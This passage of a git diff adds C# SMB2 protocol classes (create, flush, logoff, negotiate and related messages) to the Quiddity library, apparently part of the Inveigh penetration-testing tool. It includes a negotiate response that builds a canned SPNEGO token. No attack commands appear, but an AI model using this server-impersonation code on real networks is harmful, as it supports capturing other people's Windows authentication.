0x00008000, + FILE_OPEN_REMOTE_INSTANCE = 0x00000400, + FILE_OPEN_REQUIRING_OPLOCK = 0x00010000, + FILE_DISALLOW_EXCLUSIVE = 0x00020000, + FILE_RESERVE_OPFILTER = 0x00100000, + FILE_OPEN_REPARSE_POINT = 0x00200000, + FILE_OPEN_NO_RECALL = 0x00400000, + FILE_OPEN_FOR_FREE_SPACE_QUERY = 0x00800000 + } + + class SMB2CreateRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e8fb45c1-a03d-44ca-b7ae-47385cfd7997 + public ushort StructureSize { get; set; } + public byte Flags { get; set; } + public byte RequestedOplockLevel { get; set; } + public uint ImpersonationLevel { get; set; } + public byte[] SmbCreateFlags { get; set; } + public byte[] Reserved { get; set; } + public byte[] DesiredAccess { get; set; } + public byte[] FileAttributes { get; set; } + public uint ShareAccess { get; set; } + public uint CreateDisposition { get; set; } + public uint CreateOptions { get; set; } + public ushort NameOffset { get; set; } + public ushort NameLength { get; set; } + public uint CreateContextsOffset { get; set; } + public uint CreateContextsLength { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs new file mode 100644 index 0000000..3d63d60 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateResponse.cs @@ -0,0 +1,45 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + enum OplockLevel : uint + { + SMB2_OPLOCK_LEVEL_NONE = 0x00, + SMB2_OPLOCK_LEVEL_II = 0x01, + SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08, + SMB2_OPLOCK_LEVEL_BATCH = 0x09, + SMB2_OPLOCK_LEVEL_LEASE = 0xFF + } + + enum CreateAction : uint + { + FILE_SUPERSEDED = 0x00000000, + FILE_OPENED = 0x00000001, + FILE_CREATED = 0x00000002, + FILE_OVERWRITTEN = 0x00000003 + } + + class SMB2CreateResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d166aa9e-0b53-410e-b35e-3933d8131927 + public ushort StructureSize { get; set; } + public byte OplockLevel { get; set; } + public byte Flags { get; set; } + public uint CreateAction { get; set; } + public byte[] CreationTime { get; set; } + public byte[] LastAccessTime { get; set; } + public byte[] LastWriteTime { get; set; } + public byte[] ChangeTime { get; set; } + public byte[] AllocationSize { get; set; } + public byte[] EndofFile { get; set; } + public byte[] FileAttributes { get; set; } + public byte[] Reserved2 { get; set; } + public byte[] Field { get; set; } + public uint CreateContextsOffset { get; set; } + public uint CreateContextsLength { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs new file mode 100644 index 0000000..27aa414 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2ErrorResponse.cs @@ -0,0 +1,48 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2ErrorResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/d4da8b67-c180-47e3-ba7a-d24214ac4aaa + public ushort StructureSize { get; set; } + public byte ErrorContextCount { get; set; } + public byte Reserved { get; set; } + public uint ByteCount { get; set; } + public byte[] ErrorData { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs new file mode 100644 index 0000000..f0ffefb --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushRequest.cs @@ -0,0 +1,47 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2FlushRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e494678b-b1fc-44a0-b86e-8195acf74ad7 + public ushort StructureSize { get; set; } + public ushort Reserved1 { get; set; } + public uint Reserved2 { get; set; } + public byte[] FileId { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs new file mode 100644 index 0000000..2cebc5c --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2FlushResponse.cs @@ -0,0 +1,45 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2flushResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/42f78e6a-e25f-48f5-8f08-b4f1bb4c4fa4 + public ushort StructureSize { get; set; } + public ushort Reserved { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs new file mode 100644 index 0000000..0f44f5e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffRequest.cs @@ -0,0 +1,45 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2LogoffRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/abdc4ea9-52df-480e-9a36-34f104797d2c + public ushort StructureSize { get; set; } + public byte[] Reserved { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs new file mode 100644 index 0000000..1bd7b3a --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2LogoffResponse.cs @@ -0,0 +1,45 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2LogoffResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7539feb4-6fbb-4996-81ac-06863bb1a89e + public ushort StructureSize { get; set; } + public byte[] Reserved { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs new file mode 100644 index 0000000..5a3a584 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiateResponse.cs @@ -0,0 +1,164 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using Quiddity.GSSAPI; +using Quiddity.SPNEGO; +using Quiddity.Support; + +namespace Quiddity.SMB2 +{ + class SMB2NegotiateResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/63abf97c-0d09-47e2-88d6-6bfa552949a5 + public ushort StructureSize { get; set; } + public ushort SecurityMode { get; set; } + public byte[] DialectRivision { get; set; } + public ushort NegotiateContextCount { get; set; } + public byte[] ServerGUID { get; set; } + public byte[] Capabilities { get; set; } + public uint MaxTransactSize { get; set; } + public uint MaxReadSize { get; set; } + public uint MaxWriteSize { get; set; } + public byte[] SystemTime { get; set; } // todo create type + public byte[] ServerStartTime { get; set; } + public ushort SecurityBufferOffset { get; set; } + public ushort SecurityBufferLength { get; set; } + public uint NegotiateContextOffset { get; set; } + public byte[] Buffer { get; set; } + public byte[] Padding { get; set; } // todo check + public byte[] NegotiateContextList { get; set; } + + public SMB2NegotiateResponse() + { + this.StructureSize = 65; + this.SecurityMode = 1; + this.DialectRivision = new byte[2]; + this.NegotiateContextCount = 0; + this.ServerGUID = new byte[16]; + this.Capabilities = new byte[4]; + this.MaxTransactSize = 8388608; + this.MaxReadSize = 8388608; + this.MaxWriteSize = 8388608; + this.SystemTime = BitConverter.GetBytes(DateTime.Now.ToFileTime()); ; + this.ServerStartTime = new byte[8]; + this.SecurityBufferOffset = 128; + this.SecurityBufferLength = 320; + this.NegotiateContextOffset = 0; + this.Buffer = new byte[0]; + this.Padding = new byte[0]; // todo check + this.NegotiateContextList = new byte[0]; + } + + public SMB2NegotiateResponse(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.StructureSize); + packetWriter.Write(this.SecurityMode); + packetWriter.Write(this.DialectRivision); + packetWriter.Write(this.NegotiateContextCount); + packetWriter.Write(this.ServerGUID); + packetWriter.Write(this.Capabilities); + packetWriter.Write(this.MaxTransactSize); + packetWriter.Write(this.MaxReadSize); + packetWriter.Write(this.MaxWriteSize); + packetWriter.Write(this.SystemTime); + packetWriter.Write(this.ServerStartTime); + packetWriter.Write(this.SecurityBufferOffset); + packetWriter.Write(this.SecurityBufferLength); + packetWriter.Write(this.NegotiateContextOffset); + packetWriter.Write(this.Buffer); + + if (!Utilities.ArrayIsNullOrEmpty(NegotiateContextList)) + { + packetWriter.Write(this.NegotiateContextList); + } + + return memoryStream.ToArray(); + } + + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.StructureSize = packetReader.ReadUInt16(); + this.SecurityMode = packetReader.ReadUInt16(); + this.DialectRivision = packetReader.ReadBytes(2); + this.NegotiateContextCount = packetReader.ReadUInt16(); + this.ServerGUID = packetReader.ReadBytes(16); + this.Capabilities = packetReader.ReadBytes(4); + this.MaxTransactSize = packetReader.ReadUInt32(); + this.MaxReadSize = packetReader.ReadUInt16(); + this.MaxWriteSize = packetReader.ReadUInt32(); + this.SystemTime = packetReader.ReadBytes(8); + this.ServerStartTime = packetReader.ReadBytes(8); + this.SecurityBufferOffset = packetReader.ReadUInt16(); + this.SecurityBufferLength = packetReader.ReadUInt16(); + this.NegotiateContextOffset = packetReader.ReadUInt32(); + this.Buffer = packetReader.ReadBytes(8); + } + + } + + public void EncodeBuffer() + { + GSSAPIInitSecContext gssapi = new GSSAPIInitSecContext(); + SPNEGONegTokenInit spnego = new SPNEGONegTokenInit(); + spnego.MechTypes = new byte[24] { 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1e, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a }; + spnego.MechToken = new byte[264] { 0x4e, 0x45, 0x47, 0x4f, 0x45, 0x58, 0x54, 0x53, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x45, 0x42, 0x37, 0xe2, 0x9c, 0xec, 0xed, 0x6a, 0x73, 0x8a, 0x3e, 0x19, 0x27, 0xdc, 0xa0, 0xb0, 0x64, 0x56, 0x91, 0x92, 0xb4, 0x5c, 0x3d, 0x8d, 0xba, 0x32, 0xd3, 0xb1, 0x31, 0xbc, 0xab, 0x29, 0xfa, 0x47, 0x3d, 0xeb, 0x87, 0x6e, 0x53, 0xd7, 0x0c, 0x91, 0x91, 0xb1, 0xae, 0x9e, 0x6b, 0xd0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x33, 0x53, 0x0d, 0xea, 0xf9, 0x0d, 0x4d, 0xb2, 0xec, 0x4a, 0xe3, 0x78, 0x6e, 0xc3, 0x08, 0x4e, 0x45, 0x47, 0x4f, 0x45, 0x58, 0x54, 0x53, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00, 0x45, 0x42, 0x37, 0xe2, 0x9c, 0xec, 0xed, 0x6a, 0x73, 0x8a, 0x3e, 0x19, 0x27, 0xdc, 0xa0, 0xb0, 0x5c, 0x33, 0x53, 0x0d, 0xea, 0xf9, 0x0d, 0x4d, 0xb2, 0xec, 0x4a, 0xe3, 0x78, 0x6e, 0xc3, 0x08, 0x40, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x30, 0x56, 0xa0, 0x54, 0x30, 0x52, 0x30, 0x27, 0x80, 0x25, 0x30, 0x23, 0x31, 0x21, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x18, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20, 0x4b, 0x65, 0x79, 0x30, 0x27, 0x80, 0x25, 0x30, 0x23, 0x31, 0x21, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x18, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20, 0x4b, 0x65, 0x79 }; + byte[] mechTokenSegment = ASN1.Encode(4, spnego.MechToken); + mechTokenSegment = ASN1.Encode(162, mechTokenSegment); + byte[] mechTypesSegment = ASN1.Encode(48, spnego.MechTypes); + mechTypesSegment = ASN1.Encode(160, mechTypesSegment); + byte[] negTokenInitSegment = Utilities.BlockCopy(mechTypesSegment, mechTokenSegment); + negTokenInitSegment = ASN1.Encode(48, negTokenInitSegment); + negTokenInitSegment = ASN1.Encode(160, negTokenInitSegment); + byte[] gssapiData = Utilities.BlockCopy(gssapi.OID, negTokenInitSegment); + this.Buffer = ASN1.Encode(96, gssapiData); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs new file mode 100644 index 0000000..3791230 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2NegotiatelRequest.cs @@ -0,0 +1,118 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +using Quiddity.Support; +using System; +using System.IO; + +namespace Quiddity.SMB2 +{ + + class SMB2NegotiatelRequest + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5 + public ushort StructureSize { get; set; } + public ushort DialectCount { get; set; } + public ushort SecurityMode { get; set; } + public byte[] Reserved { get; set; } + public byte[] Capabilities { get; set; } + public byte[] ClientGUID { get; set; } + public uint NegotiateContextOffset { get; set; } + public ushort NegotiateContextCount { get; set; } + public byte[] Reserved2 { get; set; } + public byte[] ClientStartTime { get; set; } + public byte[] Dialects { get; set; } + public byte[] Padding { get; set; } // todo check + public byte[] NegotiateContextList { get; set; } + + public SMB2NegotiatelRequest(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.StructureSize); + packetWriter.Write(this.DialectCount); + packetWriter.Write(this.SecurityMode); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.Capabilities); + packetWriter.Write(this.ClientGUID); + packetWriter.Write(this.NegotiateContextOffset); + packetWriter.Write(this.NegotiateContextCount); + packetWriter.Write(this.Reserved2); + packetWriter.Write(this.ClientStartTime); + packetWriter.Write(this.Dialects); + packetWriter.Write(this.Padding); + packetWriter.Write(this.NegotiateContextList); + return memoryStream.ToArray(); + } + + } + + public ushort GetMaxDialect() + { + byte[] maxDialectData = new byte[2]; + maxDialectData[0] = this.Dialects[this.Dialects.Length - 2]; + maxDialectData[1] = this.Dialects[this.Dialects.Length - 1]; + return Utilities.DataToUInt16(maxDialectData); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.StructureSize = packetReader.ReadUInt16(); + this.DialectCount = packetReader.ReadUInt16(); + this.SecurityMode = packetReader.ReadUInt16(); + this.Reserved = packetReader.ReadBytes(2); + this.Capabilities = packetReader.ReadBytes(4); + this.ClientGUID = packetReader.ReadBytes(16); + this.NegotiateContextOffset = packetReader.ReadUInt32(); + this.NegotiateContextCount = packetReader.ReadUInt16(); + this.Reserved2 = packetReader.ReadBytes(2); + this.Dialects = packetReader.ReadBytes(this.DialectCount * 2); + this.Padding = packetReader.ReadBytes(8); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs new file mode 100644 index 0000000..b7f7b22 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2QueryDirectoryRequest.cs @@ -0,0 +1,70 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO 